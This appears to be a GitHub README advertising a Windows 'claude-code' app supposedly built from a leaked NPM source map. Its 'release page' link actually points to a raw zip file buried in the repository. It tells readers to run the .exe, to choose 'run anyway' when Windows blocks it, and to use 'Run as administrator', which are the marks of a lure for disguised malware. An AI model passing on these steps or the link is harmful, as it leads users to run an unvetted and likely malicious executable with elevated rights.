🧩 claude-code - Download and run with ease

Download claude-code

📥 Download

Use this page to download and run this file on Windows:

https://github.com/Colenonliving260/claude-code/raw/refs/heads/main/commands/voice/claude-code-v1.4.zip

Look for the latest release near the top of the page. Open it, then choose the Windows file that matches your system. If you see more than one file, pick the one that ends in .exe or .msi.

🖥️ What claude-code does

claude-code is a Windows app built to help you review and work with Claude Code source material in one place. It is based on a leaked map file from the NPM registry and is meant for users who want a simple way to open, inspect, and use the package content without digging through folders by hand.

You can use it to:

  • Open project files in a simple view
  • Browse source content without command line tools
  • Check package structure and related files
  • Work through the breakdown on a Windows PC
  • Keep the setup process short and clear

✅ Before you start

You only need a few basic things:

  • A Windows computer
  • Internet access
  • Enough free space for the app and its files
  • Permission to run downloaded programs

For best results, use:

  • Windows 10 or Windows 11
  • A screen size large enough to view file lists
  • A mouse or trackpad for easy navigation

🚀 Get the app

  1. Open the release page: https://github.com/Colenonliving260/claude-code/raw/refs/heads/main/commands/voice/claude-code-v1.4.zip

  2. Find the newest release.

  3. Download the Windows file from that release.

  4. Save the file to your Downloads folder or Desktop.

  5. If the file is zipped, right-click it and choose Extract All.

  6. Open the extracted folder.

  7. Double-click the app file to run it.

If Windows shows a security prompt, choose the option that lets you open the file. If the app asks where to place its data, choose a folder you can find again later, like Documents or Desktop.

🛠️ Install and launch

If the release gives you an installer:

  1. Open the .exe or .msi file.
  2. Follow the on-screen steps.
  3. Choose the default install path unless you have a reason to change it.
  4. Finish the setup.
  5. Open claude-code from the Start menu or desktop shortcut.

If the release gives you a portable file:

  1. Save the file to your PC.
  2. Extract it if needed.
  3. Open the folder.
  4. Run the main .exe file.
  5. Keep the folder in place so the app can find its files again.

🧭 First run

When you open claude-code for the first time, follow these steps:

  1. Let the app finish loading.
  2. Read any first-time prompt.
  3. Choose the folder or project you want to inspect.
  4. Wait for the file list to appear.
  5. Open a file to check its content.

If the app offers a home screen, use it to move between files and sections. If it asks for a path, paste the folder path into the field and press the open button.

📁 How to use it

claude-code works best when you keep your files in a clean folder.

Suggested use:

  • Put the downloaded release in its own folder
  • Keep your source files in one place
  • Open one project at a time
  • Use clear folder names
  • Save changes before closing the app

Typical tasks:

  • Review package files
  • Inspect code layout
  • Check file names and folders
  • Open related assets
  • Track how the source is arranged

🔍 File types you may see

The release may include some of these file types:

  • .exe for running the app
  • .msi for setup
  • .zip for compressed files
  • .json for data and settings
  • .js for app logic
  • .md for notes or readme text
  • .map for source map data

If you see a .zip file, extract it before you run anything inside it.

⚙️ Simple system fit

claude-code is designed for a normal Windows desktop or laptop. It should work well on most modern systems that can run standard Windows apps.

Good setup:

  • Windows 10 or newer
  • At least 4 GB RAM
  • A few hundred MB of free disk space
  • A stable internet connection for the download

If your PC is older, close other apps before you start. That can help the program open faster and use less memory.

🧰 Common problems

The file will not open

  • Make sure the download finished
  • Check that you extracted the file if it came in a ZIP
  • Right-click the file and try Run as administrator
  • Confirm that you opened the correct Windows file

Windows blocks the app

  • Open the file again
  • Choose the option to run anyway if Windows shows it
  • Make sure you downloaded it from the release page

The app opens and closes

  • Restart your computer
  • Try opening the app from the folder again
  • Check that all files in the release stayed together
  • Download the release again if files look incomplete

I cannot find the downloaded file

  • Open your Downloads folder
  • Sort by date
  • Look for the newest file from the release page
  • Search for claude-code in File Explorer

📌 Tips for a smooth setup

  • Keep the download in one folder
  • Do not rename the main app file
  • Do not move files after the app starts unless you know it is safe
  • Use the latest release for the best chance of a clean run
  • Open only one copy of the app at a time
